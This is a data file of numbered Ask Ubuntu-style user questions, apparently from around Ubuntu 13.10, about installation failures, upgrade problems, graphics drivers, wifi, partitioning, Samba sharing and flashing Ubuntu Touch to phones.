363458	help installing vmg magnifier program	i 'm trying to install virtual magnifying glass http : //magnifier.sourceforge.net/ as it 's the only program i can find that has a magnifier that follows the mouse with the actual magnification shown around the cursor itself . i have n't installed many programs , but have never had issues before , so any help is appreciated . after installing , i try to run the program and get vmg : error while loading shared libraries : libx11.so.6 : can not open shared object file : no such file or directory when i use ldd to check dependencies , i get . chris @ buntzen : /usr/bin $ ldd vmg linux-gate.so.1 = > ( 0xf76fe000 ) libpthread.so.0 = > /lib32/libpthread.so.0 ( 0xf76c8000 ) libx11.so.6 = > not found libgdk_pixbuf-2.0.so.0 = > not found libgtk-x11-2.0.so.0 = > not found libgdk-x11-2.0.so.0 = > not found libgobject-2.0.so.0 = > not found libglib-2.0.so.0 = > not found libgthread-2.0.so.0 = > not found libgmodule-2.0.so.0 = > not found libpango-1.0.so.0 = > not found libatk-1.0.so.0 = > not found libcairo.so.2 = > not found libdl.so.2 = > /lib32/libdl.so.2 ( 0xf76c1000 ) libc.so.6 = > /lib32/libc.so.6 ( 0xf751a000 ) /lib/ld-linux.so.2 ( 0xf76ff000 ) i 'm running ubuntu 12.04 , the amd64 version . getting this installed would help me a lot . any assistance is appreciated . thanks , chris
363459	gnome-core-apps installation	how do you go about installing these ? i installed the ppas for gnome 3.10 including the staging and i do n't have the core apps that come with gnome . i am on ubuntu 13.10 . any ideas ?
363460	uninstalled ubuntu but still get grub menu	i get the grub menu still even though i installed ubuntu on a separate partition which is now deleted .
363461	bootup errors on 13.10	when i first boot up , i always get 3 pop ups . the first on says invalid problem report â permission denied . the second and third both say sorry , ubuntu 13.10 has experienced an internal error . screenshot below thanks
363464	13.10 session-fallback-mode clock day/seconds	i installed ubuntu 13.10 in an old computer that is too slow for unity , so i had to leave it in session-fallback-mode . how can i show day and seconds in the indicator applet ? it shows hour and minute only . thnks
363467	ubuntu touch flashing failed/taking to long . black screen ! redeploy help !	so i 'm brand new to the whole unlock , root and flashing thing . i just tried flashing ubuntu touch on my galaxy nexus ( international gsm/hspa+ ) and everything seamed fine until the very end when i got this error message . error : phablet-flash : installation is taking too long or an error occured along the way . i did n't know what to do so i disconnected my device ( which was in ubuntu recovery ) and tried rebooting it from there , it worked `` sort of '' . i got the google logo with the unlocked icon then it continued to a black screen . in the installation guide on http : //www.ubuntu.com/phone/install said i should : '' try wiping the /data partition on your device and redeploy '' . the problem is that i do n't know how to do this and i 'm basically sitting here with a useless phone right now . i would be extremely grateful for some proffeexpert help .
363469	integrating skype with internet dj console	i am an internet radio host , and i have been trying to integrate skype with the internet dj console . everything i 've found on the web regarding this is at least two years old , and not of much use . it shows screencaps of jack with alsa dedicated ports , which even with the alsa plugin does not appear in the connection window of jack control , nor can i find an idjcskype plugin that will actually work .
363478	updates do n't work in ubuntu 13.10	hello guys i hope you 're all fine . this is the problem : when i execute the updater it always throws the same error saying : failed to download repository information . check your internet connection . and when i run the sudo apt-get update i get these lines at the end : w : failed to fetch cdrom : //ubuntu 13.10 _saucy salamander_ - release i386 ( 20131016.1 ) /dists/saucy/main/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu 13.10 _saucy salamander_ - release i386 ( 20131016.1 ) /dists/saucy/restricted/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch http : //ppa.launchpad.net/tiheum/equinox/ubuntu/dists/saucy/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/tiheum/equinox/ubuntu/dists/saucy/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead .
363479	upgrade from 12.04 to 12.10 problem	i dual boot with windows 7 and used to have ubuntu 13.10 but had some errors so i uninstalled ubuntu deleted the ubuntu system and wiped the logical drive i had ubuntu on . but i still wanted ubuntu so i got the windows installer and did the same setup i did before got 12.04 on my system . then when i upgraded to 12.10 it has happened 3 times now that after all updates are installed and told to restart i reboot a black terminal looking screen where i can not input anything . there was a screen once that gave me a choice of s to skip and m to manually recover but it does n't appear any more . i think it had something to do with a wubildr missing but i did n't get to read the page cause it flashed it before i understood it was n't the normal ubuntu load page . i am pretty novice with ubuntu and still learning all the commands . help please .
363480	ubuntu phone installation error ( wait for recovery expired )	i am trying to install ubuntu phone onto my nexus 4 . whenever i try to flash the files i get the error below . i am currently running android 4.3 build number jwr66y . i ca n't figure out why i keep getting this error . i have tried using sudo and -- channel devel and -d mako but none of them gave me a different answer . error : phablet-flash : wait for recovery expired also , if possibly can someone tell me when i can download the rom so i can try to install it using a custom recovery .
363485	how do you change the default unicode shortcut ctrl shift u to something else ?	how do you change the default unicode shortcut ctrl + shift + u to something else ?
363486	external wifi card that supports monitor mode	does anyone know of an external wifi card that works with ubuntu ( preferably out-of-the-box ) and supports monitor mode ? i 'm running ubuntu 13.10 on a retina macbook pro ( 64-bit ) and the built in card does n't seem to support monitor mode . happy to provide any more info if it will be helpful .
363491	samba share not on network after upgrading to ubuntu 12.04lts .	i just upgraded an old ubuntu box to 12.04lts ( machine named a-ubuntu ) . this is an upgrade not a format re-install . all the accounts and config were preserved . the basic setup is a local network with 2 ubuntu machines ( let say a-ubuntu , b-ubuntu ) and a mac ( c-mac ) . before the upgrade , all of them could see each other by their names not only the ip address . the local network has a d-link router where everybody is connected with rj-45 wired etherenet ( not wi-fi ) . since the a-ubuntu upgrade , we ca n't see this machine name on the network and its name is not on machine list in the d-link router anymore . we can see it 's ip address only . i ca n't access a-ubuntu from the other two by its name but i can ping it with its address ( 192.168.0.109 ) . from a-ubuntu , i can connect and see the shared samba folders on b-ubuntu and c-mac . but from b-ubuntu and c-mac , i ca n't connect to a-ubuntu . correct me if i 'm wrong but this tells me that samba should be fine and the real problem is that a-ubuntu does not advertise its name on the network so the d-link does not have it in its table so nobody else finds it . after a lot of googling , i see that it is the job of avahi and mdns to do so . those packages are running , i checked multiple config files for samba , avahi , mdns to see as if it is like the examples on the web and also similar to what i find on the working b-ubuntu machine . this is the same . i did multiple service restart with samba , avahi , remove the firewall to make sure it does not block the hostname broadcast . i rebooted multiple time to make sure the update i was making were effective . still , ca n't see the a-ubuntu name on the network . any idea what it can be ? , where to look next ?
363493	ubuntu will not load up from my usb	i have a sony vaio duo 13 and i am trying to get ubuntu 13.10 to run on a partition on my ultrabook but it will not load up from the usb drive . it goes to the black screen that asks if you just want to try ubuntu or if you want to install it . i click just to try and it will not load . it acts like it is going to start up but then it just goes to a blank black screen and then i have to a hard restart . it does that when i click install as well . and i have tried disabling the secure install on my computer as well and nothing happens ! what do i do ? ! ?
363494	stud ubuntu howto ?	i 've just been looking at the stud init script as i thought perhaps i 'm meant to create a stud.conf inside /etc/stud however , in looking through the init script it would apppear that it loads stud.conf variables into the current environment . this of course fails for some reason and you get a bunch of errors . worse still , stud source code does n't work with environment variables . can someone tell me how you 're actually meant to set up stud with init script as it would appear to be completely broken . maybe i can just disable the init script and call stud from rc.local ?
363496	errors while updating ubuntu 13.10	when i execute the updater it always throws the same error saying : failed to download repository information . check your internet connection . and when i run the sudo apt-get update i get these lines at the end : w : failed to fetch cdrom : //ubuntu 13.10 saucy salamander - release i386 ( 20131016.1 ) /dists/saucy/main/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu 13.10 saucy salamander - release i386 ( 20131016.1 ) /dists/saucy/restricted/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch http : //ppa.launchpad.net/tiheum/equinox/ubuntu/dists/saucy/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/tiheum/equinox/ubuntu/dists/saucy/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead
363498	upgraded 13.04 to 13.10 and it does n't read my quad core	basically as the question says . 13.04 read all quad cores fine ; not sure why 13.10 is n't . running 64-bit on alienware m11x r3 .
363499	how to reproduce dvd videos ?	i installed ubuntu gnome 13.10 on my computer yesterday , and everything seems to be working fine so far , except that it is n't reading video or audio cd 's and dvd 's . at first , i inserted a dvd video , and it played normally for maybe 30-45 seconds before coming up with a `` internal read error '' or something like that . i was using the totem player when the problem occurred , so i tried to install the vlc media player . it would n't read the disc at all , so i uninstalled the player . now , the totem player wo n't even begin playing the dvd . the player sometimes does n't even open up when i insert the dvd , and other times it will but says it ca n't read it . i 've tried several different dvd 's and cd 's with similar results . the computer is recognizing the optical drive , because when i open `` files '' , it shows the drive and the disc , but ca n't play it . previously , i ran ubuntu 13.04 with the gnome desktop installed from the software center , and i had no issues . any help is appreciated !
363503	the adt tools bar does not work ?	i download the adt ball from the internet and unpack it on ubuntu 13.10.but the menu bar does n't work , it can not show any content when i click it .
363504	ubuntu 13.10 screen flickering	i have installed ubuntu 13.10 and am facing constant issue with mouse flickers . also i have dual screen and my secondary screen is having significant lag while screen updates and i can see cursor trails on the screen . i tried to install the nvidia drivers and it killed my system i had to reinstall the os . any help will be highly appreciated .
363506	question regarding drives	i am a new ubuntu user who has spent a lot of time on windows . a very common practice for me on windows was making two drives , c : and d : , storing installs/files in c : , and i used d : for backup or if i downloaded something that i wanted to save , i saved it in d : when installing ubuntu , it asked me if i wanted to replace windows 7 . i thought it would install ubuntu on c : but instead it used the whole partition , nevertheless i recovered my backup using testdisk . what i wanted to do was to create a similar backup drive on linux too . my current partition table : sda 8:0 0 232.9g 0 disk ├─sda1 8:1 0 230.9g 0 part / ├─sda2 8:2 0 1k 0 part └─sda5 8:5 0 2g 0 part [ swap ] sr0 11:0 1 1024m 0 rom so should i use gparted to create another sda3 and store my important data on that ? also my current sda2 is listed as an extended partition , should i delete it ? it 's a very small partition , just 1k .
363507	fix a broken ubuntu installation from pendrive	something went wrong in the upgrade of my ubuntu 13.04 to 13.10 the upgrade basically crashed halfway through . on booting i was thrown into a maintainence screen . i found some online instructions for fixing with the package manager ... which seemed to do a lot of setting up . but then crashed saying package is in a bad inconsistent state . now i 'm in a position where ubuntu starts again , but goes into a low-res screen and there 's no wifi . i have no ethernet cable connection but i did download the 13.10 iso on another machine and put it on a pen drive . so i 'd like to know there 's a way of asking the machine from inside ubuntu to redo its upgrade from the data on the pendrive rather than wifi . is this possible ? cheers phil
363508	does kernel influences the performance greatly ?	i 'm now testing performance of an armel filesystem and armhf filesystem , which are of the same distribution , but different kernels . the performance of the memory of the two filesystems differs a lot . anybody can tell me which influence the performance more , kernels or armel vs armhf ? thanks in advance !
363510	power button in lubuntu 13.10 will not suspend	i made the upgrade on my lubuntu machine to 13.10 yesterday . everything seemed to go smoothly except one niggling thing i ca n't seem to fix . previously , i had set the power button to suspend my computer when it was pressed- i was able to set this in the xfce power manager . however after the upgrade , pressing the power button will shutdown the computer rather than suspending . i did a test and checked the logs and found this when i pressed the power button : auth.log : oct 21 22:48:35 inspiron-1564 systemd-logind [ 748 ] : power key pressed . auth.log : oct 21 22:48:35 inspiron-1564 systemd-logind [ 748 ] : powering off ... auth.log : oct 21 22:48:35 inspiron-1564 systemd-logind [ 748 ] : system is powering down . i 'm stuck here . somehow systemd-logind thinks i want to shut the computer down , but i 'm not sure where those settings may be . any help is greatly appreciated . additionally , while this post has an answer that has a roundabout method of solving the problem , i will not accept that as an answer because it essentially does n't work , and is not how the problem should be solved .
363511	using ubuntu server , how to denaied the user permisson	how to make a client server interaction via ubuntu 12.10 server
363513	can ubuntu 12.04 lts/13.04 be installed on asus k55vm-sx128 ?	iâm new to ubuntu . is it possible to install ubuntu 13.04 or 12.04 on asus k55vm-sx128 laptop ?
363514	( k ) ubuntu 13.10 clock messing up my windows clock	i run kubuntu/windows7 dual boot on 6 computers -- 3 laptops and 3 desktops by various makers . i upgraded to 13.10 yesterday . the time displays correctly in ubuntu , but my windows clock is showing utc time . i have to reset it manually every time i start windows . kubuntu 13.10 is doing something to my clock settings on every machine . any suggestions ?
363518	ca n't remove gpt data from mbr	i am having difficulty getting the ubuntu installer ( and gparted ) to recognize the partitions on my mbr type disk . other operating systems and disk tools read the disk structure and the files on it fine . i have used fixparts to write a new mbr but the issue persists . i assume the issue stems from the protective mbr data still present on the disk but i am at a loss as to how to remove it while preserving my ntfs data partition . microsoft windows [ version 6.1.7601 ] copyright ( c ) 2009 microsoft corporation . all rights reserved . c : \users\mike\desktop\fixparts > fixparts 3 : fixparts 0.8.8 loading mbr data from 3 : warning : 0xee partition does n't start on sector 1 . this can cause problems in some oses . mbr command ( ? for help ) : running gdisk shows microsoft windows [ version 6.1.7601 ] copyright ( c ) 2009 microsoft corporation . all rights reserved . c : \users\mike\desktop\fixparts > gdisk 3 : gpt fdisk ( gdisk ) version 0.8.7 partition table scan : mbr : mbr only bsd : not present apm : not present gpt : not present *************************************************************** found invalid gpt and valid mbr ; converting mbr to gpt format in memory . this operation is potentially destructive ! exit by typing 'q ' if you do n't want to convert your mbr partitions to gpt format ! *************************************************************** ************************************************************************ most versions of windows can not boot from a gpt disk , and most varieties prior to vista can not read gpt disks . therefore , you should exit now unless you understand the implications of converting mbr to gpt or creating a new gpt disk layout ! ************************************************************************ are you sure you want to continue ? ( y/n ) : y command ( ? for help ) : p disk 3 : : 2930277168 sectors , 1.4 tib logical sector size : 512 bytes disk identifier ( guid ) : bfe92ce8-f93d-4141-82b8-816ad06fb36e partition table holds up to 128 entries first usable sector is 34 , last usable sector is 2930277134 partitions will be aligned on 2048-sector boundaries total free space is 163846893 sectors ( 78.1 gib ) number start ( sector ) end ( sector ) size code name 1 163842048 2930272255 1.3 tib 0700 microsoft basic data command ( ? for help ) : r recovery/transformation command ( ? for help ) : o disk size is 2930277168 sectors ( 1.4 tib ) mbr disk identifier : 0x00000000 mbr partitions : number boot start sector end sector status code 1 1 2930277167 primary 0xee recovery/transformation command ( ? for help ) : q
363519	vcr-tracking-like static during boot	i am new . i am trying to fix a graphical glitch during the boot sequence . during the phase where dots fill across the screen and the word `` ubuntu '' is displayed , i get a graphical glitch where vcr-tracking-static flashes across the screen . can you help me with the static ?
363521	lenove z570 brightness setting gone in ubuntu 13.10	my lenovo z570 with ubuntu 13.10 only now has not brightness controls . i tried some of the command line hacks ( xbacklight and all ) and checked all my drivers and bios ( all are up to date ) but nothing works thus far . since there were no issues with this in ubuntu 13.04 , i have to wonder if someone on the 13.10 team fat-fingered or simply forgot to lay in the coding for that functionality . bright screens waste energy and lives are lost in the developing world as a result , so let 's get on this friends and resolve it .
363525	determining if a soft link already exists	how can you determine if a soft link already exists ? i do not know how to determine this . i am a novice to unix/linux
363526	libreoffice ca n't use keyboard shortcuts while typing in any language but english ?	i 'm using libreoffice under ubuntu 13.10 . using english as main language arabic as another language . when writing english i can use keyboard shortcut like ctrl+c or ctrl+v . when starting to write in arabic i ca n't use all these shortcuts any more . i must change language to english again just to do cut - paste stuff ! thank u in advance .
363529	tty1 prompt before lightdm	after upgrading to 13.10 , every time i boot i 'm shown a login prompt ( tty1 ) for ~30 seconds before lightdm automatically starts . everything works fine after that . any ideas on what i could try to fix/debug this ? my /var/log/lightdm/x-0-greeter.log contains lines like the following : ** ( at-spi2-registryd:1381 ) : warning ** : failed to register client : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.sessionmanager was not provided by any .service files ** ( at-spi2-registryd:1381 ) : warning ** : unable to register client with session manager warning : failed to open sessions directory : error opening directory '/usr/share/lightdm/sessions ' : no such file or directory ** message : pid 1534 ( we are 1534 ) sent signal 15 , shutting down ... ** ( gnome-settings-daemon:1401 ) : warning ** : name taken or bus went away - shutting down searching for these errors results in a variety of bugs filed over the years . maybe a clean install will fix this .
363530	where can i find the official virtual box for ubuntu 13.10 ?	where can i find the official virtual box for ubuntu 13.10 ? i would like to run windows xp on it as the application i want to run needs .net 2.0
363536	create a new rails show the error message	bundler could not find compatible versions for gem `` bundler '' : in gemfile : rails ( = 4.0.0 ) depends on bundler ( < 2.0 , > = 1.3.0 ) current bundler version : bundler ( 1.0.15 ) i am already update bundler 1.4.0 and they will be show in the terminal $ bundle show * bundler ( 1.4.0.rc.1 )
363538	kubuntu screensaver create multiple process and after close , all of theme does n't close	kubuntu screensaver create multiple process and after screensaver close , all of theme does n't close . kcometen4.kss is name of processes . one time in login , screensaver open in multiple window ! like normal windows in kde . how can i solve this problem . i have kubuntu 13.10 sorry for my bad english .
363542	fujitsu u2010 ca n't watch youtube	i 've installed 13.04 on my u2010 and everything went fine until i tried to watch youtube . the video played ok with 240p resolution but there is ticking sound that really making watching the video a pain . i 'm a newbie so i do n't know where to check . googled a little bit but seems not many people bother to install the os on u2010 . please help . thanks , yk
363545	how do i reverse changes in the terminal	i am a newbie trying to fix a problem and ended up typing video=svideo-2 : d into the terminal , i am worried that i changed something i should n't have changed . how can i change it back ?
363551	how to mounting a windows shared folder with samba ?	i 'm following a lot of tutorials but nothings work with me . so my question is what i need to have samba services to mount and windows shared folder ? my last trying is this : kevin @ anayanet : ~ $ smbtree enter kevin 's password : ciberbyte \\pc01 \\pc01\documentos c \\pc01\nueva carpeta \\pc01\c \\pc01\ipc $ ipc remota then i run this command : kevin @ anayanet : ~ $ sudo mount -t smbfs -o user=administrador , password=bug. $ % 10 //pc01/documentos desktop/shared_pc01/ and what i got was this : mount error : could not resolve address for pc01 : unknown error thanks in advanced linux people .
363554	problems with upgrading to ubuntu 13.10	i did an upgrade from ubuntu 13.04 to 13.10 . everything went ok until the end , when i got this message : the system is running in low graphics mode . i read something about it . some say the problem is with the graphic card ( ati amd radeon ) . i try to install the drivers but it didnâ´t work . do i have the wrong drivers ? i donâ´t know . i am new in ubuntu and i am a little lost , anybody has the same problem ?
363555	how do you install spotify for clementine 1.2	as the title says , i know that there one time was a download button to install spotify but i dont have it . is there something else you have to do for 1.2 ? i downloaded it from www.clementine-player.org , i also tried it in arch just to see if it worked there but same problem .
363557	partition ( data ) recovery	i have install ubuntu 13.10 in my pc after installation i have seen that all my personal data on other drives means other than primary disk has been lost . please help me to recover my all data that i have lost.i have tried the gnu parted , testdisk & gpart method . in this commands described in the ubuntu support are not working in my pc .
363561	12.04 wifi problem	i know this has been asked a million times and that there are loads of topics on this all over the internet , but no solution worked for me so far . i have a lenovo computer with a broadcom wifi thingie . i recently installed ubuntu 12.04 on it , and i ca n't turn wifi on . i logged into the internet using an ethernet connection and downloaded updated and installed all the right drivers using the synaptic package manager , and it didnt help . i tried to clear caches , didnt do anything . i tried to delete the old kernel and reboot- no good . i used alot of those sudo apg-get bc43 commands aswell , they all seem to do something , but i dont get any result . before , they used tto say that they didnt find the package . after i installed it from the synaptic package manager , they all say that the newest version is already installed . anyone has any idea what should i do next ? edit : i did this : sudo apt-get install linux-firmware-nonfree now i have the option `` enable wireless '' under the enable networking option in the internet manu . but it still wo n't recognize any wifi near me . my internet switch on my laptop is on btw , and it 's working perfectly on windows .
363562	13.10 completely unusable after driver install	i installed the recommended driver for my radeon hd 7870 ghz edition graphics card . according to system settings - > software & updates - > additional drivers , i have the recommended ati/amd graphics driver installed . regardless , i ca n't even login . upon reboot the keyboard no longer works and the screen resolution is 1024x768 . ( native resolution is 1920x1080 ) my power supply is 650w and runs perfectly on windows . it can also max out any game i 've played on it . the issue here is 100 % ubuntu . apart from reinstalling ubuntu what can i do ? i can give other info if needed , i 'm unsure what else to give .
363563	my screen is bigger than my tv , how can i change the size ?	i 'm running ubuntu on a mid-2010 mac mini with in-built nvidia 320m graphics , it 's connected to a 32 '' lcd tv via hdmi cable . the edges of the screen are 'cut off ' somewhat , and changing the resolution does n't seem to help . can anyone help me change the size of the screen ? if it helps , the display is recognised as a 'jvc 7 '' ' in the settings , it is most certainly not 7 '' .
363565	can not upgrade to 13.10	software updater app just crashes with segmentation fault . any ideas where to look further ? ~ âť sudo update-manager update-managerchecking for a new ubuntu release authenticate 'saucy.tar.gz ' against 'saucy.tar.gz.gpg' extracting 'saucy.tar.gz' segmentation fault ( core dumped )
363567	dell inspiron 1525 wont shut down or restart have to hold power button for 5 seconds	i have an old dell inspiron 1525 with a single core celron 2ghz processor , 2gb ram 20gb hard drive . i just installed 13.10 on it and it runs very well . there is one problem , however . if i try to restart or shut it down , it will not do it . the screen will go into a digital scramble/frozen look if you know what i mean , and freezes up totally . i have to hold the power button in for 5 or 6 seconds and shut it off and restart it that way . i have done all the updates , etc that i know of , and believe me i am no amateur when it comes to ubuntu or pclinuxos 2012/2013 kde .
363568	black screen on power up and nothing else	i start my computer and all i get is a black screen with no cursor . just a completely black screen . i hold down the shift key , but grub does not come up . i just finished installing the latest desktop version . after install finished it rebooted then just went black . i have an nvidia gt 430 graphics card .
363569	13.10 live versus installed	i have downloaded the 13.10 desktop version to bootable usb . when run `` live '' all is ok , but when installed , graphics performance is 'dismal ' ( compiz proc at > 70 % when idle ) . in live mode , 'details ' reports an intel gd mmx/sse2 driver but when installed it reports gallium 0.4 . i assume this is the issue . how can i get back to the driver that works ? device is intel atom with gma 3150 graphics .
363570	help ! problem ca n't do anyting on ubuntu 13.10	i upgraded from ubuntu 13.04 to 13.10 but when i open my laptop it freezes before i can login ant the gnome 3 splash screen . alt ctrl + f ( any ) not working . the only thing i can do is manualy power off . i tryied everything on recovery mode screen and some stuff about grub ( nomodeset quiet splash stuff i found at this forum ) but nothing is working . i ca n't reach tty 's to login so i ca n't reinstall drivers for my ati radeon mobility hd 5xxx . that is my secs http : //www.sony.co.uk/support/en/product/vpceb2e1e_wi/specifications .
363574	wired network connection drops frequently	network connection being dropped even after updating the driver to the latest realtek one r8168-8.037.00 . i am running ubuntu 13.04 . i need to usually reboot my router to fix and or the cable modem also . other systems connected do n't have this problem . linux driver for kernel 3.x and 2.6.x and 2.4.x also i added the following as well . ctrl+alt+t echo on | sudo tee /sys/class/net/eth0/device/power/control below shows my lspci -v output i put in bold the ethernet item in question 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168 pci express gigabit ethernet controller ( rev 03 ) subsystem : hewlett-packard company device 1449 flags : bus master , fast devsel , latency 0 , irq 45 i/o ports at 2000 [ size=256 ] memory at d1004000 ( 64-bit , prefetchable ) [ size=4k ] memory at d1000000 ( 64-bit , prefetchable ) [ size=16k ] expansion rom at d1010000 [ disabled ] [ size=64k ] capabilities : < access denied > kernel driver in use : r8169**
363576	i can not download the ubuntu touch sdk due to hashsum mismatch	when i download the ubuntu touch sdk , i receive the following erros : w : failed to fetch bzip2 : /var/lib/apt/lists/partial/us.archive.ubuntu.com_ubuntu_dists_saucy_universe_binary-amd64_packages hash sum mismatch w : failed to fetch bzip2 : /var/lib/apt/lists/partial/us.archive.ubuntu.com_ubuntu_dists_saucy_universe_binary-i386_packages hash sum mismatch can someone tell me how to solve the problem ?
363577	ubuntugnome 13.10 - problem : keyboard layout : control l and caps lock swapped	i have a problem in ubuntugnome 13.10 which i did n't had in prior releases : i did a clean install and i do n't know if it was already there or if i may have changed something , but my `` control l '' and `` caps lock '' keys are swapped . how to swap them back ? see also the attached image . http : //i.imgur.com/pr1yb4t.jpg i swapped them back using the following , but this is obviously not a proper fix : $ cd ~ $ echo `` keycode 66 = control_l nosymbol control_l remove lock = caps_lock remove control = control_l keysym control_l = caps_lock keysym caps_lock = control_l add lock = caps_lock add control = control_l '' > > .xmodmap $ xmodmap .xmodmap but the `` keyboard layout chart '' program shows the keys still swapped . what 's the reason for this ? how to fix ?
363581	sudo apt-get check gives me the following error	sudo apt-get check reading package lists ... error ! e : read error - read ( 21 : is a directory ) e : the package lists or status file could not be parsed or opened please let me know how to resolve this issue . thanks in advance
363584	sound not working after ending hdmi connection	i have an hp envy 15t-j000 installed with ubuntu 13.10 . when connecting my computer to a monitor via hdmi , i have no problem getting the sound to come from the monitor speakers . my problem is that after disconnecting the hdmi cable , my computer 's speakers do n't produce any sound from youtube , vlc , spotify , and etc . what 's odd though is that system sounds are still there , such as the sounds you get when pushing on the increase or decrease volume buttons . also , the sound test in sound settings works perfectly . any solutions ? could it just be a bug because this is a new release ?
363597	upgraded to 13.10 , black screen after login	after upgrading to 13.10 from 13.04 the notebook screen is deadly black as the x server starts ; the only workaround i found is to start with an external monitor connected . doing this way i can login in and once i set the mirroring desktop i can normally operate on the external monitor . the strange thing is that if i use xrandr to set the brightness to the maximum on lvds i can see a little bit the images on the screen : but just a really little bit ! ! i guess it 's related to the amd-driver catalyst version 13.20.16 beta 1 ( fglrx ) , the only i can use with the new kernerl 3.11 . ( i tried even with other version of fglrx : the last stable on the amd-site , and the one provided in ubuntu-repository ; but nothing changes ) my graphic adapter is an ati mobility radeon 5xxx and if i try to not use ati proprietary driver i can see correctly both screens but the system become very slow and all the interface is unstable ( compiz does n't load , cairo-dock doesnt ' start , and so on ... ) please let me know what kind of more depth infos i could provide : i can not find how to attach some file/log to this post ... thanks in advance for your piece of advices !
363601	lubuntu 13.10 - ca n't install vmware tools	some days ago i installed lubuntu 13.10 ( on vmware server ) . now i want to install vmware-tools , but after running ./vmware-install.pl -d , i get : the following vmware kernel modules have been found on your system that were not installed by the vmware installer . please remove them then run this installer again . vmci i.e . - 'rm /lib/modules/3.11.0-12-generic/misc/ < modulename > . { o , ko* } '' any idea what can i do ?
363602	how to publicly access virtual windows server 2008 r2 on ubuntu 13.10 using vmware player 6.0 ?	i am using ubuntu 13.10 and vmware player 6.0 for virtual windows server 2008 r2 . i have to check something in sharepoint 2010 . both host and guest can access internet . now i want to access sharepoint by other machine in internet . means guest virtual windows server 2008 r2 server must be visible publicly in internet . please advise me how can do it ? p.s : i am using adsl internet and have full control to configure it . my http server in ubuntu is already publicly accessible . thanks in advance !
363603	how to upgrade evolution in 13.10	the version of evolution that comes with ubuntu 13.10 , v3.8.4 , spends and enormous amount of time scanning email folders on startup , something the version with 13.04 did in seconds . it seems that v3.8.4 is considered obsolete by the team developing it . how might 13.10 users upgrade evolution to a working version ?
363607	installing ubuntu 13.10 alongside windows 8	i have an issue . when i install ubuntu , i burn it on a disk and boot it , the installer opens and everything is fine till i come to the installation location . there i can just see my hard disk name sata ... . but no drives . it just says add partion tables or continue . when i click on continue , there is an error . 'no root drive specified ' . what should i do ?
363612	ubuntu touch stuck at google screen	i tried installing ubuntu touch on my nexus 4 . when i try to boot , it 's stuck at the google screen . any ideea how to solve this ? i mean booting to ubuntu , i know how to get back to recovery .
363619	how to safely copy home folder from a 10.04 desktop to a new ubuntu 12.04 installation on a notebook ?	recently i 've bought a new notebook . i 'm going to install ubuntu 12.04 next to win8 with dual boot config . is it ерфе simple and safe to just copy my home folder from an old desktop with ubuntu 10.04 to a new 12.04 installed system ? or should i do that other way ?
363620	update from 13.04 to 13.10	first of all i installed in my external usb ubuntu 13.04 , then ( thanks to google ) i installed kde ( by adding kubuntu package ) , so at last i got kubuntu 13.04 . was happy until kde show me that i can update to kubuntu 13.10. cliked on all requested button and typed my password , the upgrade did not finished ( because of * & '' ăš ! : ; standby mode of my pc ) . so i repeated it again and it finished without problem . but now i have small issues : when i start kde or unity , it still ask to me to upgrade to 13.10 when i check about this computer in unity it shows version 13.10 , but when i check with lsb_release -a , it shows me *distributor id : ubuntu description : linux-secure-remix-32bit 20-may-2013 release : 13.04 codename : raring* when i start the upgrade again to 13.10 by gui or terminal ( do-release-upgrade ) , always got in the middle ( after disabling 3rd party package , and just before starting downloading files ) that my pc does not have disponible update , so upgrade will be canceled : checking package manager reading package lists ... done building dependency tree reading state information ... done building data structures ... done calculating the changes calculating the changes the software on this computer is up to date . there are no upgrades available for your system . the upgrade will now be canceled . do you want to start the upgrade ? continue [ yn ] details [ d ] so seems that i messed with the upgrading process . could you help me please ?
363623	handling partitions	on my 160 gib hd i do have 3 partitions . sda1 ( ext4 ) = 83 gib sda2 ( extended = 77 gib sda6 ( ext4 ) = 75 gib 12.04 is installed on the sda1 partition , but because of the fact that i am not so familiar in handling partitions i am not sure if another ios ever have been installed on sda2 or sda6 . all my files in /home are stored in sda1 that 's for sure . when i start with a stick were 13.10 is created i get the line : > initramfs and nothing works after this . i would like to clean up the hd and install alongside 12.04 lts the new ubuntu 13.10 but i am afraid to loose all my files because i am not sure which partition ubuntu use actually . can i see the content of the different partition in my terminal ? how to do ? can i clean up a partition which one is not used by ubuntu actually and then install 13.10 how can help me in a understandable language for me ? best regards and thanks beforehand rolf
363624	ubuntu 13.10 : when using `` try ubuntu '' from my flash drive , wifi works , when fully installed , wifi does n't work	when i use the `` try ubuntu before installing '' option from my flash drive , it connects to my router just fine , and i have an internet connection . after fully installing ubuntu 13.10 , i can only connect with a wired connection . the top bar will show that i am successfully connected to my router , but i can not load web pages . can anyone provide help ?
363626	how to mount .iso file on hard drive	i 'm right now in some troubles . i 've matlab r2012b.iso which sizes 5.25 gb . i tried to mount it using furius and k3b . but when i put dvd+r double layer in cd-rom , it says `` uable to mount , location is already mounted . '' what to do .
363627	can i install ubuntu 13.10 64-bit alongside windows 8 32-bit ?	i am planning to dualboot windows 8 and ubuntu 13.10 . my windows 8 is a 32-bit os . can i install ubuntu 13.10 64-bit alongside it ? my processor is 64-bit capable and my laptop is a relatively new one .
363628	after upgrade : what 's this envelope systray icon , and how do i get rid of it ?	i 've just upgraded from 13.04 to 13.10 and everything seems to be running fine . i have a couple new icons in my systray , though , and one of them -- the envelope icon -- is a mystery to me : it looks like a chat notifier ( clicking it gives `` available '' , `` away '' , `` busy '' , etc. , indicators ) but i do n't use pidgin ( never have ) , or it could be an email indicator but i do n't use thunderbird ( never have ) . there 's nothing else i can see ( left- or right-clicking ) that identifies it . i 'd like to get rid of it , but `` startup applications '' only lists the ones i have optionally added , and this is not among them . any help appreciated !
